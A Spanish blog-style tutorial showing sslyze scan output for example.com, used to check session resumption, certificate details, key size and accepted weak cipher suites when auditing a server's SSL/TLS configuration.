En muchas ocasiones el servidor se encuentra detrás de un balanceador de carga que se encarga de balancear las peticiones web  que hacen los usuarios. Con sslyze podemos detectar si el servidor puede encontrarse detrás de un balanceador:

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Session Resumption Rate : 0 resumptions successful out of 100 attempts. Errors were encountered.

SCAN COMPLETED IN 5.10 S  ————————

En este caso el servidor NO se encuenta detrás de un balanceador

• Obtener información aerca del certificado

Otra información útil que podemos obtener es información sobre el certificado, información básica

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Certificate :       Validation w/ Mozilla’s CA Store:  Certificate is NOT Trusted               Subject CN:                        plesk                                    Issuer:                            /C=US/ST=Virginia/L=Herndon/O=Parallels/OU=Plesk/CN=plesk/emailAddress=info@plesk.com       Serial Number:                     4D75F9B5                                 Not before:                        Mar  8 09:41:09 2011 GMT                 Not after:                         Mar  7 09:41:09 2012 GMT                 Keysize:                           2048 bits                                Signature Algorithm:               sha1WithRSAEncryption                    Version:                           1 (0×0)                                  SHA1 Fingerprint:                  A61526A0E8FD6D1A1A028573376EA9BB7C9578C9       Number of Extensions:              0

SCAN COMPLETED IN 0.67 S  ————————

Aquí hay información básica sobre el certificado.

• Información completa sobre un certificado en concreto

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Certificate :       Validation w/ Mozilla’s CA Store:  Certificate is NOT Trusted             Data:         Version: 1 (0×0)         Serial Number: 1299577269 (0x4d75f9b5)         Signature Algorithm: sha1WithRSAEncryption         Issuer: C=US, ST=Virginia, L=Herndon, O=Parallels, OU=Plesk, CN=plesk/emailAddress=info@plesk.com         Validity             Not Before: Mar  8 09:41:09 2011 GMT             Not After : Mar  7 09:41:09 2012 GMT         Subject: C=US, ST=Virginia, L=Herndon, O=Parallels, OU=Plesk, CN=plesk/emailAddress=info@plesk.com         Subject Public Key Info:             Public Key Algorithm: rsaEncryption             RSA Public Key: (2048 bit)                 Modulus (2048 bit):                     00:ae:f7:6a:2f:de:db:17:bd:2b:4e:57:f5:d7:96:                     fb:50:b9:04:54:8b:1b:5e:61:fe:77:24:99:12:8f:                     cc:1d:49:91:e4:d3:a0:4b:46:0e:b4:80:e4:a7:dd:                     ed:13:1e:90:21:2b:cc:72:54:a8:f7:b3:e1:12:62:                     a7:e5:52:24:66:58:07:25:ab:a0:7d:1a:cc:6c:f5:                     dd:66:4c:aa:07:32:8b:6b:d4:51:eb:f7:93:2f:0a:                     e8:36:f3:8f:7c:b0:68:c7:21:46:65:87:4e:48:92:                     dd:31:c9:d2:81:5f:b2:c1:32:f4:1f:bf:4c:23:65:                     ad:5d:ff:d9:72:ea:a9:90:e7:14:ea:9a:39:b9:43:                     21:cb:ea:37:74:dd:11:e0:c9:35:e2:50:c2:10:6c:                     0d:76:58:b9:74:73:fb:c9:7f:e9:7d:5d:00:05:92:                     1f:3a:8b:fd:ba:7d:e5:c0:1f:16:01:05:9d:88:a4:                     f1:b4:36:5b:cf:67:d3:86:ee:b7:d9:b5:6c:31:c0:                     a9:b3:4a:ba:eb:2b:d7:d4:54:bf:dc:87:2c:66:2c:                     0b:85:ac:6d:4b:7c:e7:ee:04:ca:6c:1c:a1:e9:74:                     c7:b7:fa:38:44:bb:e0:f1:e8:4b:b6:e6:c1:e7:1e:                     9d:06:92:88:55:c2:b0:bf:5b:99:34:db:cc:1b:bf:                     cb:35                 Exponent: 65537 (0×10001)     Signature Algorithm: sha1WithRSAEncryption         8b:f0:45:e6:93:ba:8f:75:51:4c:14:68:47:f6:d1:0c:3b:da:         d9:c9:15:b2:c8:b2:b8:8f:09:35:69:c8:d4:72:cc:3d:6d:e3:         ae:72:90:81:9d:39:8a:62:81:13:42:0a:3a:2f:8c:a6:d4:fb:         40:f1:44:8c:a4:ea:da:c4:a4:c5:ea:96:e2:4f:f8:7d:90:a3:         fd:77:06:e7:92:e1:c3:ab:af:ff:48:b3:69:8f:1f:94:79:11:         b1:98:ac:54:ea:94:e7:e8:7b:5f:6c:fc:d3:8e:69:84:4d:83:         31:ed:4f:b5:b2:0e:60:e9:00:56:29:f5:13:b1:ac:97:84:5c:         55:4c:e3:8b:2f:54:ad:94:39:05:1d:55:27:88:c8:65:be:91:         48:b6:df:09:d0:00:db:b1:cf:c5:8c:c6:23:11:1a:a1:7a:b8:         e0:19:f1:96:b8:75:c3:80:60:93:8e:cd:57:18:fb:14:9d:11:         15:82:69:4d:08:5a:5d:14:18:28:a2:65:dc:8f:69:31:b0:11:         f5:85:18:58:ee:ef:4c:ea:fa:0d:81:a4:e1:9f:bf:da:9d:0f:         0c:f6:41:ce:0b:41:79:2f:ac:a3:1f:88:87:fa:d0:40:10:26:         69:51:86:16:24:e2:ac:a8:ed:12:08:53:85:71:10:4d:19:d6:         a4:25:48:e5

SCAN COMPLETED IN 0.68 S  ————————

Aparte de la información básica podemos obtener toda la información sobre el certificado

• Obtener información sobre el key size del certificado

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Certificate :       Validation w/ Mozilla’s CA Store:  Certificate is NOT Trusted               Keysize:                           2048 bits

SCAN COMPLETED IN 0.66 S  ————————

Si solo queremos tener información acerca del tamaño del certificado podemos hacer esta consulta

• Obtener el CN del certificado

Si por el contrario sólo queremos obtenert el CN del  certificado podemos hacer la consulta que nos devolverá:

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Certificate :       Validation w/ Mozilla’s CA Store:  Certificate is NOT Trusted               Subject CN:                        plesk

SCAN COMPLETED IN 0.91 S  ————————

• Permitir negociar con un cifrado mas bajo

Un atacante podría hacer fuerza bruta con los civfrados mas bajo del servidor. Solo se debe permitir negociar con el cifrado mas fuerte

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* TLSV1 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DHE-RSA-AES256-SHA  256bits                  Preferred               200 OK        RC4-SHA  128bits                             Accepted                200 OK        RC4-MD5  128bits                             Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        EXP-EDH-RSA-DES-CBC-SHA  40bits              Accepted                200 OK        EXP-DES-CBC-SHA  40bits                      Accepted                200 OK        EDH-RSA-DES-CBC3-SHA  168bits                Accepted                200 OK        EDH-RSA-DES-CBC-SHA  56bits                  Accepted                200 OK        DHE-RSA-AES128-SHA  128bits                  Accepted                200 OK        DES-CBC3-SHA  168bits                        Accepted                200 OK        DES-CBC-SHA  56bits                          Accepted                200 OK        AES256-SHA  256bits                          Accepted                200 OK        AES128-SHA  128bits                          Accepted                200 OK        NULL-SHA                               Rejected – SSL Alert           N/A          NULL-MD5                               Rejected – SSL Alert           N/A          EXP-EDH-DSS-DES-CBC-SHA                Rejected – SSL Alert           N/A          EXP-ADH-RC4-MD5                        Rejected – SSL Alert           N/A          EXP-ADH-DES-CBC-SHA                    Rejected – SSL Alert           N/A          EDH-DSS-DES-CBC3-SHA                   Rejected – SSL Alert           N/A          EDH-DSS-DES-CBC-SHA                    Rejected – SSL Alert           N/A          DHE-DSS-AES256-SHA                     Rejected – SSL Alert           N/A          DHE-DSS-AES128-SHA                     Rejected – SSL Alert           N/A          ADH-RC4-MD5                            Rejected – SSL Alert           N/A          ADH-DES-CBC3-SHA                       Rejected – SSL Alert           N/A          ADH-DES-CBC-SHA                        Rejected – SSL Alert           N/A          ADH-AES256-SHA                         Rejected – SSL Alert           N/A          ADH-AES128-SHA                         Rejected – SSL Alert           N/A

* SSLV3 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DHE-RSA-AES256-SHA  256bits                  Preferred               200 OK        RC4-SHA  128bits                             Accepted                200 OK        RC4-MD5  128bits                             Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        EXP-EDH-RSA-DES-CBC-SHA  40bits              Accepted                200 OK        EXP-DES-CBC-SHA  40bits                      Accepted                200 OK        EDH-RSA-DES-CBC3-SHA  168bits                Accepted                200 OK        EDH-RSA-DES-CBC-SHA  56bits                  Accepted                200 OK        DHE-RSA-AES128-SHA  128bits                  Accepted                200 OK        DES-CBC3-SHA  168bits                        Accepted                200 OK        DES-CBC-SHA  56bits                          Accepted                200 OK        AES256-SHA  256bits                          Accepted                200 OK        AES128-SHA  128bits                          Accepted                200 OK        NULL-SHA                               Rejected – SSL Alert           N/A          NULL-MD5                               Rejected – SSL Alert           N/A          EXP-EDH-DSS-DES-CBC-SHA                Rejected – SSL Alert           N/A          EXP-ADH-RC4-MD5                        Rejected – SSL Alert           N/A          EXP-ADH-DES-CBC-SHA                    Rejected – SSL Alert           N/A          EDH-DSS-DES-CBC3-SHA                   Rejected – SSL Alert           N/A          EDH-DSS-DES-CBC-SHA                    Rejected – SSL Alert           N/A          DHE-DSS-AES256-SHA                     Rejected – SSL Alert           N/A          DHE-DSS-AES128-SHA                     Rejected – SSL Alert           N/A          ADH-RC4-MD5                            Rejected – SSL Alert           N/A          ADH-DES-CBC3-SHA                       Rejected – SSL Alert           N/A          ADH-DES-CBC-SHA                        Rejected – SSL Alert           N/A          ADH-AES256-SHA                         Rejected – SSL Alert           N/A          ADH-AES128-SHA                         Rejected – SSL Alert           N/A

* SSLV2 Cipher Suites :       Cipher Suite:                             SSL Handshake:           HTTP GET:       DES-CBC3-MD5  168bits                        Preferred               200 OK        RC4-MD5  128bits                             Accepted                200 OK        RC2-CBC-MD5  128bits                         Accepted                200 OK        EXP-RC4-MD5  40bits                          Accepted                200 OK        EXP-RC2-CBC-MD5  40bits                      Accepted                200 OK        DES-CBC-MD5  56bits                          Accepted                200 OK

SCAN COMPLETED IN 2.10 S  ————————

En este caso podemos negociar cualquiera de los certificados

Ya tenéis otra herramienta para testear tu seguridad ssl.

Saludos cordiales